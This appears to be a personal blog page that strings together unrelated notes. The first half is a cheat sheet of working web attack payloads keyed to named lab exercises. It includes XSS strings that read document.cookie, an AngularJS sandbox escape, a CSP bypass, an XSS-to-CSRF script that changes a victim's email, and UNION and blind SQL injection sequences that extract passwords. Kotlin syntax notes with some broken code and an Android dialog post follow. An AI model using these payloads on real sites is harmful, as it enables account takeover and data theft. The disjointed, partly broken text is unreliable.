Reflected DOM XSS - quotes escaped, backslash not
\"-alert(1)}// Reflected XSS into HTML context with no encoding <script>alert(1)</script> Reflected XSS into HTML context with most tags and attributes blocked <iframe src="https://vulnerable-site.com/?param=%22%3E%3Cbody%20onresize=alert(document.cookie)%3E" onload=this.style.width='100px'> Reflected XSS into HTML context with all tags blocked except custom ones using onfocus <script>location = 'https://vulnerable-site.com/?param=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x'; </script> Reflected XSS with event handlers and href attributes blocked https://vulnerable-site.com/?param=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20here%3C%2Ftext%3E%3C%2Fa%3E Reflected XSS with some SVG markup allowed using onbegin https://vulnerable-site.com/?param=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E Reflected XSS into attribute with angle brackets HTML-encoded "onmouseover="alert(1)Stored XSS into HTML context with nothing encoded<script>alert(1)</script>Stored XSS into anchor href attribute with double quotes HTML-encoded javascript:alert(1) Reflected XSS in canonical link tag using OS access keys https://vulnerable-site.com/?%27accesskey=%27x%27onclick=%27alert(1) Reflected XSS into a JavaScript string with single quote and backslash escaped </script><script>alert(1)</script> Reflected XSS into a JavaScript string with angle brackets HTML encoded '-alert(1)-' Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped test'payload test\payload \'-alert(1)// Reflected XSS in a JavaScript URL with some characters blocked https://vulnerable-site.com/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27 Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped http://foo?'-alert(1)-' Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped ${alert(1)} Reflected XSS with AngularJS sandbox escape without strings https://vulnerable-site.com/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1 Reflected XSS with AngularJS sandbox escape and CSP <script> location='https://vulnerable-site.com/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; </script> DOM XSS in document.write sink using source location.search "><svg onload=alert(1)> DOM XSS in document.write sink using source location.search inside a select element param?paramId=1&storeId="></select><img%20src=1%20onerror=alert(1)> DOM XSS in innerHTML sink using source location.search <img src=1 onerror=alert(1)> DOM XSS in jQuery anchor href attribute sink using location.search source javascript:alert(document.cookie) DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded {{$on.constructor('alert(1)')()}}Stored DOM XSS <><img src=1 onerror=alert(1)> Exploiting XSS to perform CSRF <script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/site-endpoint',true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/site-endpoint/request', true); changeReq.send('csrf='+token+'&[email protected]') }; </script> Reflected XSS protected by CSP, with CSP bypass https://vulnerable-site.com/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27
0 Comments
Links
SQL injection UNION attack, determining the number of columns returned by the query '+UNION+SELECT+NULL-- --Keep adding more NULL values, noting unique responses SQL injection UNION attack, finding a column containing text '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses SQL injection UNION attack, retrieving data from other tables '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'-- --Ex: 2 columns containing text '+UNION+SELECT+col_name1,+col_name2+FROM+table_name-- --Retrieve contents from table SQL injection UNION attack, retrieving multiple values in a single column '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses --Retrieving contents of table_name, where col_name1 & col_name2 are columns: '+UNION+SELECT+NULL,col_name1||'~'||col_name2+FROM+table_name-- SQL injection attack, querying the database type and version on Oracle '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'+FROM+DUAL-- --Ex: 2 columns w/ text '+UNION+SELECT+BANNER,+NULL+FROM+v$version-- --Display DB version SQL injection attack, querying the database type and version on MySQL and Microsoft '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'# --Ex: 2 columns w/ text '+UNION+SELECT+@@version,+NULL# --Display DB version SQL injection attack, listing the database contents on non-Oracle databases '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'-- --Ex: 2 columns w/ text --Retrieve the list of tables in the database: '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- SQL injection attack, listing the database contents on Oracle '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'+FROM+DUAL-- --Ex: 2 columns w/ text --Retrieve the list of tables in the database: '+UNION+SELECT+table_name,NULL+FROM+all_tables-- --Retrieve the details of the columns in the table: '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'-- --Retrieving particular columns in a table: '+UNION+SELECT+COL_NAME1,+COL_NAME2+FROM+TABLE_NAME-- Blind SQL injection with conditional responses --Tracking cookie e.g. TrackingId=xyz. Testing boolean conditions to observe response. TrackingId=xyz' AND '1'='1 TrackingId=xyz' AND '1'='2 --Test for existence of a particular table - 'table_name' TrackingId=xyz' AND (SELECT 'a' FROM table_name LIMIT 1)=' --Test for existence of a particular user - 'user_name' TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name')='a --Determine the # of chars. in password of user_name above. If true, char. length > 1 TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>1)='a --Follow-up tests for password length, incrementing 'n' TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>n)='a --Extract a single character from the password, and test it against a specific value. Increment 'n' each cycle. TrackingId=xyz' AND (SELECT SUBSTRING(password,n,1) FROM table_name WHERE col_name='user_name')='a Blind SQL injection with conditional errors --Assume tracking cookie, modify its value, check for response TrackingId=xyz' TrackingId=xyz'' --Confirm that the server is interpreting the injection as a SQL query - valid/invalid? TrackingId=xyz'||(SELECT '')||' --Oracle database? TrackingId=xyz'||(SELECT '' FROM dual)||' --Submitting an invalid query while still preserving valid SQL syntax to verify if injection is being processed as --a SQL query by the back-end if error is returned TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||' --Verifying existence of a particular table - 'table_name'. If no error, likely exists. TrackingId=xyz'||(SELECT '' FROM table_name WHERE ROWNUM = 1)||' --Check for error message, triggering errors conditionally on truth of a condition (1=1) or (1=2) TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' --Check for existence of particular username - 'user_name'. If error arises, likely exists. TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' --Determine # of chars in user_name discovered above TrackingId=xyz'||(SELECT CASE WHEN length(password)>1 THEN to_char(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' --Testing password lengths, increment length until error disappears TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' --Increment 'n' to extract a single character from the password, and test it against a specific value TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,n,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' Blind SQL injection with time delays --Tracking cookie, SQLi TrackingId=x'||pg_sleep(10)-- Blind SQL injection with time delays and information retrieval --App with tracking cookie, testing for time delay TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END-- TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END-- --Testing for particular table and column TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- --Determining # of chars in col_name (insert_name) TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- --Increment 'n' to test different password lengths. Correct length is determined once there is no time delay. TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>n)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- --Testing match for each password char. Start 'n' at 1, increment until password length determined above. TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+substring(password,n,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- SQL injection vulnerability in WHERE clause allowing retrieval of hidden data '+OR+1=1-- SQL injection vulnerability allowing login bypass administrator'-- == operator
String sr2 = new String(str1); if(str1 == str2){ // str2 and str2 are two separate Strings references, will never print print("True, str1 and str2 point to the same reference") } else { print("False, str1 and str2 point to separate references") // Output }
val str2 = String(str1.toCharArray) if(str1 == str2) { // this will be the output, because == is equivalent to str1.equals(str2) print("str1 and str2 both have the value "Hello") } else { print("str1 and str2 have different values") } === operator - In Kotlin, the '===' operator is equivalent to Java's '==' operator and tests to see if the reference is equal Class constructor example:
// Class with no body class Car // Class with parameters class Car(var make: String, var model: String, var year: Int, var color: String) { fun drive() { } } Object instantiation: var car = Car("Tesla", "Model S", 2018, "silver") Accessing class properties(local variables) and functions: // property 'make' println(car.make) // prints "Tesla" // function drive() car.drive()
Creating an array of objects: var manyCars = arrayOf(Car("Toyota", "Camry", 2017, "red"), Car("Nissan", "Rogue", 2013, "gray"), Car("Ford", "F-150", 2012, "black")) Accessing an object array's element: manyCars[0].model // "Camry" manyCars[2].drive() // Ford F-150 calls drive() Class initializer blocks: class Car(var make: String, var model: String, var year: Int, var color: String) { fun drive() { } init { print("New car, $make $model pulling up") } init { // this runs after the above 'init'. 'init' blocks run in the order of appearance in code } } Custom getter and setter functions: class Car(var make: String, var model: String, var year: Int, var color: String) { var mpg: Int get() = // do something to calculate/derive the above 'mpg' // a future access of 'Car.mpg' would auto-call this get() var verifiedYear = year set(value) { if(value != 0) { // field identifier used Kotlin to avoid circular dependency issues field = value } } set() // often used to validate values/data // set() auto-called each time a value is assigned e.g. 'Car.verifiedYear = 1999' fun drive() { } } - If there is no explicit getter or setter declarations, the compiler creates them automatically. 'val' properties have just the getter method (due to value being immutable) created, while 'var' properties get both. Superclasses and Subclasses
// Superclass open class Car(var make: String, var model: String, var year: Int, var color: String) { var mpg open val country open fun drive() { } } // Subclass class SportsCar : Car() { // use override keyword to override superclass properties or functions override val country override fun drive() // for superclass properties defined with 'var', it doesn't need to be overridden init { mpg = 25 } } Abstract classes & interfaces Abstract classes and interfaces are still declared the same way in Kotlin using the 'abstract' and 'interface' keywords. // abstract class abstract class Animal { abstract val species: String fun classify() { ... } } // interface interface Hunt { fun chase() { println("Chase prey") } } Kotlin does not have the keywords 'inherits' or 'implements'. // The class MyAnimal implements the 'Hunt' interface and inherits from the 'Animal' class class MyAnimal: Hunt, Animal() { override val species: String get() = "Lion" } Abstract class constructor abstract class Animal(private val species: String) { fun classify() { println("The animal is part of the $species species") } } Kotlin function signature:
fun functionName(varName: varType): returnType { return varName } Example: fun isLegal(age: Int): Boolean { return if(age >= 18) } // or fun isLegal(age: Int): Boolean = age >= 18 // multiple parameters fun applicant(age: Int, name: String) { ... } // function with no return /** fun displayTotal(num1: Int, num2: Int): Unit {} -- using (: Unit) can also delineate the function does not return **/ fun displayTotal(num1: Int, num2: Int) { val total = num1 + num2 println(total) } // function with return fun larger(firstNum: Int, secondNum: Int): Int { val largerNum = if(firstNum > secondNum) firstNum else secondNum return largerNum } // above larger() function can be further simplified: fun larger(firstNum: Int, secondNum: Int): Int = if(firstNum>secondNum) firstNum else secondNum // you can remove return type of function and allow compiler to infer it from your 'if' statement fun larger(firstNum: Int, secondNum: Int) = if(firstNum>secondNum) firstNum else secondNum Calling the function: val legal = isLegal(21) // True val legal isLegal(10) // False Default function parameter values: fun displayMsg(message: String, name: String = "visitor") { println("Howdy $name, $message") } // function calls displayMsg("nice to meet you!", "Sarah") // Output: Howdy Sarah, nice to meet you displayMsg("pleasure to be of acquaintance") // Output: Howdy visitor, pleasure to be of acquaintance Variable number of function arguments // Allows non-fixed number of arguments of declared type (argType) fun funName(vararg argName: argType): returnType { } main() function
public class MainClass { public static void main(String[] args) { System.out.println("Hello world"); } } Kotlin: fun main(args: Array<String>) { println("Hello World") } Static functions class NumberPicker { // 1 companion object allowed per class companion object { // declare function inside a 'companion' object block to delineate 'static' fun spinWheel () { } } } /** call spinWheel(). Unlike Java, no need to call function using a class instance (e.g. NumberPicker c = new NumberPicker(); c.spinWheel(); **/ NumberPicker.spinWheel() Static factory function private class SecretClass private constructor() { companion object() : SecretClass { fun create() : SecretClass { return SecretClass() } } } // instantiate a new SecretClass instance val sc = SecretClass.create() kotlin.collections package - site for reference.
- Allows declarations of immutable or mutable collections List<Double> // immutable List of Double objects MutableList<Double> // mutable List of Double objects Arrays // array type inferred val numArray = arrayOf(1, 2, 3, 4, 5, 6, 7) // array type specified val intArray = intArrayOf(1, 3, 5, 7, 9) joinToString() println(numArray.joinToString() ) // show contents of 'numArray' (1, 2, 3 .. etc) /** Adding symbols/chars before and after the array contents In below example, parenthesis enclosing array contents (1, 2, 3, 4..) **/ println(numArray.joinToString(prefix = "(", postfix = ")")) // specifying separator between array contents other than default commas ',' println(numArray.joinToString(prefix = "(", postfix = ")", separator = "*")) // Output: (1*2*3*4... etc) Lists, Sets, Maps // immutable list val nameList = ListOf("Jen:", "Joe", "Jim") // mutable list val mutableNameList = mutableListOf("Jack", "James", "Joey") // Set: unique contents only, so the set would contain 2 and 4 only val numSet = setOf(2, 2, 4, 4) // mutable set val mutableNumSet = mutableSetOf(2, 2, 4, 4) // immutable map val alphabet = mapOf(1 to "a", 2 to "b", 3 to "c") println(map) // Output: {1=a, 2=b, 3=c} // mutable map val alphabet = mutableMapOf(1 to "a", 2 to "b", 3 to "c", 4 to "d") println(map) // Output: {1=a, 2=b, 3=c, 4=d} if statements:
val num = 21 if (num < 21) { println("Underage drinker") } else { println("Adult") } // Output: Adult Assigning variable with outcome of 'if' statement: // 'age' will be assigned the string after the println() val age = if(num < 21) { printlln("Underage drinker") "Do not allow drinking" // if 'num' is under 21, 'age' assigned "Do not allow drinking" } else { println("Legal drinker") // 'num' is over 21, 'age' assigned "Allow drinking" "Allow drinking" } Using 'if' statement as an expression // corresponding else clause is mandatory when using 'if' as an expression println(if (a > b) "a is greater than b" else "a is less than b") when statements:
val cost = 100 when(cost) { 0 -> println("Free admission") 50 -> println("Half-price admission") 51..99 -> println("Over 50% off admission") else -> println("Full-price admission") // default } // Output: Full-price admission Assigning variable with outcome of 'when' statement: // 'admission' will be assigned the appropriate string based on corresponding 'when' condition val admission = when(cost) { 0 --> "Free admission" 50 --> "Half-price admission" 51..99 --> "Over 50% off admission" else ---> "Full-price admission" } while & do-while loops: // while loops in Kotlin have similar syntax to Java val num = 0 while(i <10) { println("$num ") num++ } do { println(num) num++ } while(num < 20) for loops: for(i in 1..20) { print("$i ") } // or, the above simplified: // Output: Integer range of 1-20 (e.g. 1 2 3 4 5...etc, includes 100) for(i in 1..100) print("$i ") // Output: same as above, but excludes end number 100) for(i in 1 until 100) print("$i ") for(chars in "Kotlin language") { print("$chars ") } // Output: Each character of string w/ space between each character (e.g. K o t l i n l a n g .. etc) Using downTo operator in 'for' condition, reverses range of output for(i in 100 downTo 1) { print("$i ") } // Output: 100, counting down by 1 (e.g. 100 99 98 97 .. etc) Using downTo operator + step for(i in 100 downTo 1 step 5) { print("$i ") } // Output: 100, counting down by 5-step increments (e.g. 100 95 90 85 .. etc) Looping through an array for(item in numArray) { println("$item is an item in numArray") } Looping through an array using its index for((index, item) in numArray.withIndex()) { println("numArray[ $index ] has the element $item) } Looping through a string to print each of its characters val language = "Kotlin" for(c in language) { print(c) } Data types
Integer types
Some points regarding variables and data types in Kotlin:
Kotlin variable declaration
greeting = "Hi again" // not allowed, 'greeting' immutable due to 'val' declaration
greeting = "Hello World, v2" // allowed, 'var' declaration allows mutability var age = 21 // mutable variable (value and reference to object can change) var age: Int = 21 // no semi-colon required at end of declaration statement val name = "John" // 'val' for immutable variables (reference to object unchangable ) val name: String = "John" // equivalent to declaration above val isHuman: Boolean = true Kotlin and immutability or null safety val str: String = null // not allowed val str: String? = null // use '?' after the data type when wanting to assign 'null' val i: Int? = null - Kotlin will warn at compile time when a variable is null Unsafe and safe operators for null in Kotlin // 'str' is null str!!.length // using unsafe operator '!!', throws null pointer exception str?.length /** safe operator that returns null if 'str' is null, the value of 'str.length' if 'str' is not null **/ val length = str?.length ?: -1 /** ?: - Elvis operator. If 'str' is null, assign -1 to 'length', otherwise, length of 'str' assigned value of its 'length' **/ Recently, while working on a personal app project, I became interested in custom styling for the AlertDialog boxes. Overall, I wanted the app to have a unified theme/feel and didn't want to exclude even the small detail of dialog box appearances. Perhaps I had never noticed before, but the ordering of the confirm and cancel buttons/options on the dialog boxes are a little bit odd. Researching the issue, this was apparently a complaint going back to 2012. For those wanting a little more detail, it's basically the ordering of the confirm/cancel buttons that are represented visually and programmatically as: As indicated in the Issue Tracker link, this seems to be an intentional change for Android versions 4.0+. To be fair, I have noticed this similar ordering in operating system alerts (Linux Ubuntu, perhaps) as well, so I suppose it isn't too odd. States of connectivity on mobile devices
Getting & monitoring connectivity status
Determining server reachability
ICMP & HTTP pinging problems
HTTP Transport Libraries
|
AuthorExploring Android and mobile web design, security, and development. Archives
March 2021
Categories |